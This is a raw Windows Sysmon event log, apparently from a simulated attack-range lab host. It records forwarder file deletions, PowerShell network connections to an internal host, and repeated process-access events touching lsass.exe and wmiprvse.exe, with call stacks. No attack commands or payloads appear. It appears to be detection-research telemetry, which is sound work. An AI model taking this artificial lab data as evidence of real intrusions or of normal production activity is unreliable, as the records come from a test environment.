Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E880B3B85955DA81BE85574346B308B7,SHA256=13DA22D9FBE687F1546F0D4C31349DBE2BA1D94DBBB030F070728832C774D7E1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127834Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:09.357{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62076-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127833Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:45.476{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=806E213678D52AC79F40D208D517AB62,SHA256=084926DC0408B15C5A3591EEB2E5E33990A59F38A7A611846B6368E6D4DD6210,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127835Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:46.496{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC6E8F8B7966DCB466797DEA658DE0E4,SHA256=9905BAEDC4AF72BEA701321C7BE544A80EB560BD1F5D8AA535BAE8F60669CE55,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127836Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:47.511{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28521BD8B8886D216B3C18E4CC043D0A,SHA256=63E719BBB59EB78A7FAF1DAF7A4D06F2ADFF3CD255B70D41ACD284ED1FEA8555,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127840Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:13.370{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62078-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035127839Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:12.423{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62077-false10.0.1.12-8000- 23542300x800000000000000035127838Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:48.525{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8AC19D7783F9E162EB8BAD50B607DEBE,SHA256=EE41735E6C91432A547FF302DAE27346DDFF79F746706F027F27AACECDEF6E2F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127837Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:48.210{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=9C09D07F635933438F1CCF24365B3DD9,SHA256=C548215D28B6A7DD9CA8B0075B18CD330B67014A1F603ECE885A99A5CC28AA21,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127841Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:49.526{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57DA2D517638EDC8F0983243F2339FB7,SHA256=256C07F2CB719032243C589CCE25C6CB7C9C43462EF871E212DE4AAD030FE960,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127842Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:50.556{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0958016C34D54B48C4000F0911C4E6E,SHA256=113C4F90BEBFE07B224A9D62AEE3ACF35CBEA21EC7AEF43FDA45280857030991,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127843Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:51.570{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3533A321B2AD734CC2978D686ACE3FCF,SHA256=5DD6B511BD161E51E7A265E046DF5B9BAB386DD3681215128C980B9655221967,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127844Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:52.587{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4609D578A8D4ED71A28C31D98A0CC619,SHA256=A5FE72C9DD60109121397F449FF61E0CDFDEB2CDA2BC17F2B0E21864D733ED77,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127846Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:53.606{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0CE0145D0E0526AB9D39D3C45080DBC,SHA256=529B6741985EBF6F679DE499E55300FFCE8F4898A12082319426ADC088AC181D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127845Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:53.237{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A7C708E0197203B484E68663C681F9B3,SHA256=EA5F27F1C8775537F811C58983BFA198F175E413A9A62BC2259A9B854455E7FF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127849Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:54.651{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=975CF8F5D6894B03CFE8875B5D63F2ED,SHA256=907B28866FD0A01D738D6F32F725561BC48C2D5E9306D3E44A9AC9489AC39A86,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127848Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:18.389{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62080-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035127847Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:18.303{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62079-false10.0.1.12-8000- 23542300x800000000000000035127850Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:55.667{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5132D041BF538DDE561287759AA0395,SHA256=3139841E7A1463BF4A9D34F3DC2E14CDFAAA6E85104D1FA8E9540070B4744FEA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035127881Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:56.235{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127880Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:56.235{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127879Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:56.235{B81B27B7-4012-611D-0B00-00000000C801}6361736C:\Windows\system32\lsass.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127878Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:56.220{B81B27B7-4013-611D-1600-00000000C801}11962328C:\Windows\system32\svchost.exe{B81B27B7-82EC-613A-BE96-03000000C801}6796C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+3ef6a|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+b920|C:\Windows\system32\wbem\wbemcore.dll+255ff|C:\Windows\system32\wbem\wbemcore.dll+24a9a|C:\Windows\system32\wbem\wbemcore.dll+2485e|C:\Windows\system32\wbem\wbemcore.dll+dc51|C:\Windows\system32\wbem\wbemcore.dll+2cfdf|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127877Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:56.204{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-82EC-613A-BE96-03000000C801}6796C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127876Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:56.188{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-82EC-613A-BE96-03000000C801}6796C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035127875Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:56.188{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-82EC-613A-BE96-03000000C801}6796C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127874Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:56.167{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127873Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:56.167{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127872Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:56.167{B81B27B7-4012-611D-0B00-00000000C801}6361736C:\Windows\system32\lsass.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127871Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:56.151{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-82EC-613A-BD96-03000000C801}6736C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127870Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:56.151{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-82EC-613A-BD96-03000000C801}6736C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127869Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:56.151{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-82EC-613A-BD96-03000000C801}6736C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127868Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:56.151{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-82EC-613A-BD96-03000000C801}6736C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127867Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:56.151{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-82EC-613A-BD96-03000000C801}6736C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127866Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:56.151{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-82EC-613A-BD96-03000000C801}6736C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127865Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 